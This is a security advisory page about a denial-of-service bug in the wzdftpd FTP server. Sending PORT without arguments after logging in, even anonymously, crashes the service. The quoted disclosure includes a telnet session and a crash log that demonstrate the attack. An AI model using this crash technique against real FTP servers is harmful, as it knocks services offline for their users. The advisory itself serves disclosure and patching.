Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (File Transfer/Sharing)  >   wzdftpd Vendors:   Chifflier, Pierre
'wzdftpd' FTP Service Can Be Crashed By Remote Authenticated Users
SecurityTracker Alert ID:  1007076
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 27 2003
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 0.1rc4 and prior versions
Description:   A vulnerability was reported in wzdftpd. A remote authenticated user can cause the FTP service to crash.

It is reported that a remote authenticated user, including an anonymous user, can issue a PORT command without any arguments to cause the FTP service to crash.

Impact:   A remote authenticated user (including anonymous users, if anonymous FTP is enabled) can cause the FTP service to crash.
Solution:   The vendor has reportedly released a fix, available in the CVS version.
Vendor URL: (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.

 Source Message Contents

Subject:  wzdftpd remote DoS

Title: wzdftpd remote DoS
Affected: wzdftpd <= 0.1rc4
Risk: High
Exploitable: Yes
Remote: Yes
Date: June, 27 2003

"A portable, modular and efficient ftp server, supporting SSL,
winsock, multithreaded, modules ,externals scripts. unix-like
permissions+acls, virtual users/groups, security, speed, bandwith
limitation (user,group,global), group admins, per command auth"

wzdftpd crashes after sending command "PORT" w/out args. 

$> telnet 21
Connected to
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
Connection closed by foreign host.
$> telnet 21
telnet: connect to address Connection refused
telnet: Unable to connect to remote host

So, we see server is down.
Jun 11 23:00:33 fbd kernel: pid 7149 (lt-wzdftpd), uid 0: exited on signal 11 (core dumped)

This bug is fixed on June, 12 in a CVS version. 

-Roman Bogorodskiy [Novel]


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC